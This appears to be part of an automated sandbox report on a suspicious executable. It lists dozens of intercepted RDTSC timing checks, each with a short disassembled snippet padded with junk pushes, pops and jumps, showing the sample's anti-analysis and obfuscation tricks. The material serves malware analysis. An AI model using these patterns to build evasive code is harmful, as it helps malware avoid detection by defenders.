                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 640112 second address: 640135 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 jmp 00007FB9E5277428h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 6404F8 second address: 640519 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9E4B2921Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jmp 00007FB9E4B2921Dh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 645140 second address: 64516C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB9E5277427h 0x00000009 jmp 00007FB9E5277421h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 64516C second address: 64517C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007FB9E4B29216h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 64D9B2 second address: 64D9B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 64D9B8 second address: 64D9CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB9E4B2921Dh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 64C2B9 second address: 64C2C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 64C438 second address: 64C453 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 jmp 00007FB9E4B29224h 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 64C6F7 second address: 64C716 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jne 00007FB9E527742Ah 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jmp 00007FB9E5277422h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 64C716 second address: 64C725 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9E4B2921Ah 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 64C871 second address: 64C877 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 64C877 second address: 64C896 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB9E4B29229h 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 654387 second address: 6543A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 jmp 00007FB9E5277421h 0x0000000c popad 0x0000000d jnp 00007FB9E527741Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 653D84 second address: 653D8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 653F36 second address: 653F3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 653F3A second address: 653F5B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FB9E4B29221h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push edx 0x0000000d pop edx 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 653F5B second address: 653F61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 65F9F1 second address: 65F9F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 65F9F7 second address: 65FA53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9E5277421h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007FB9E527741Fh 0x00000011 jmp 00007FB9E5277427h 0x00000016 jmp 00007FB9E527741Fh 0x0000001b popad 0x0000001c jno 00007FB9E527741Eh 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 65FA53 second address: 65FA6E instructions: 0x00000000 rdtsc 0x00000002 je 00007FB9E4B2922Dh 0x00000008 jmp 00007FB9E4B29221h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 65FBB4 second address: 65FBBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 65FBBA second address: 65FBBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 65FBBE second address: 65FBC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 65FBC4 second address: 65FBD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b jns 00007FB9E4B29216h 0x00000011 pop edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 65FBD6 second address: 65FBE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9E527741Dh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 661EFA second address: 661EFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 66BD1E second address: 66BD22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 66BD22 second address: 66BD42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 pop esi 0x0000000a pushad 0x0000000b jg 00007FB9E4B2921Ah 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 jg 00007FB9E4B29216h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 66BD42 second address: 66BD50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FB9E5277416h 0x0000000a popad 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 66D363 second address: 66D3A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FB9E4B29222h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007FB9E4B2921Eh 0x00000013 push esi 0x00000014 pop esi 0x00000015 jo 00007FB9E4B29216h 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e jc 00007FB9E4B29216h 0x00000024 jmp 00007FB9E4B2921Ah 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 66D3A7 second address: 66D3B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007FB9E5277416h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 66D3B3 second address: 66D3BD instructions: 0x00000000 rdtsc 0x00000002 js 00007FB9E4B2921Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 678172 second address: 678178 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 678178 second address: 6781C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FB9E4B29229h 0x00000008 js 00007FB9E4B29216h 0x0000000e pop eax 0x0000000f jmp 00007FB9E4B2921Dh 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b jmp 00007FB9E4B29222h 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 6781C1 second address: 6781D4 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB9E5277416h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jnp 00007FB9E5277416h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 6781D4 second address: 6781E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007FB9E4B29216h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 67B69D second address: 67B6A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 681034 second address: 681050 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB9E4B29222h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 681050 second address: 681054 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 681054 second address: 681076 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9E4B29224h 0x00000007 jmp 00007FB9E4B2921Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 681076 second address: 68108F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB9E5277425h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 67FA7E second address: 67FA95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FB9E4B2921Eh 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 67FE63 second address: 67FE6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 68038B second address: 68038F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 68038F second address: 680393 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 680393 second address: 6803AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FB9E4B29223h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 6803AE second address: 6803B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 6803B3 second address: 6803BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 680D44 second address: 680D60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FB9E5277426h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 683D59 second address: 683D63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FB9E4B29216h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 683D63 second address: 683D67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 683D67 second address: 683D70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 6838F9 second address: 6838FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 683A31 second address: 683A36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 683A36 second address: 683A64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB9E5277422h 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007FB9E527741Dh 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push edi 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 6854CA second address: 6854DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9E4B2921Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 6854DC second address: 6854E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 6854E0 second address: 6854E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 68F27A second address: 68F28A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007FB9E5277418h 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 69E61E second address: 69E624 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 69E624 second address: 69E635 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB9E527741Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 6A39C2 second address: 6A39C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 6A3605 second address: 6A360B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 6B8A15 second address: 6B8A19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 6B78A8 second address: 6B78AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 6B78AD second address: 6B78C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB9E4B2921Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 6B78C1 second address: 6B78C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 6B78C5 second address: 6B78D3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007FB9E4B29235h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 6B7A3E second address: 6B7A5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB9E527741Fh 0x00000009 popad 0x0000000a jc 00007FB9E527742Dh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 6B7BCC second address: 6B7BF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FB9E4B2921Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jmp 00007FB9E4B29220h 0x00000011 pop ecx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 6BCC8E second address: 6BCC98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FB9E5277416h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 6BCC98 second address: 6BCCC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9E4B29221h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FB9E4B29222h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 6BCD52 second address: 6BCD56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 6BCD56 second address: 6BCD61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FB9E4B29216h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 6BCFEA second address: 6BCFF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 6BCFF0 second address: 6BD002 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 6BD002 second address: 6BD006 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 6BD006 second address: 6BD010 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB9E4B29216h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 6BD010 second address: 6BD043 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jno 00007FB9E5277416h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e jmp 00007FB9E5277424h 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 pushad 0x00000018 jp 00007FB9E5277418h 0x0000001e pushad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 6BEAB2 second address: 6BEAB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5DC17C second address: 5DC182 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5DC363 second address: 5DC367 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 4E304D6 second address: 4E304DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 4E304DA second address: 4E304E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 4E304E0 second address: 4E304E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 4E304E6 second address: 4E304EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 4E30568 second address: 4E3056E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 4E3056E second address: 4E30577 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, D0C3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 4E5052E second address: 4E50597 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9E5277421h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007FB9E5277427h 0x00000010 mov eax, 4990348Fh 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 jmp 00007FB9E5277422h 0x0000001c mov ebp, esp 0x0000001e pushad 0x0000001f call 00007FB9E527741Eh 0x00000024 movzx ecx, di 0x00000027 pop ebx 0x00000028 mov bx, ax 0x0000002b popad 0x0000002c xchg eax, ecx 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 mov cl, dh 0x00000032 pushad 0x00000033 popad 0x00000034 popad 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 4E50597 second address: 4E5059D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 4E5059D second address: 4E505A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 4E505A1 second address: 4E505A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 4E505A5 second address: 4E505B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 4E505B2 second address: 4E505C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edx, ecx 0x00000006 popad 0x00000007 mov cl, 71h 0x00000009 popad 0x0000000a xchg eax, ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
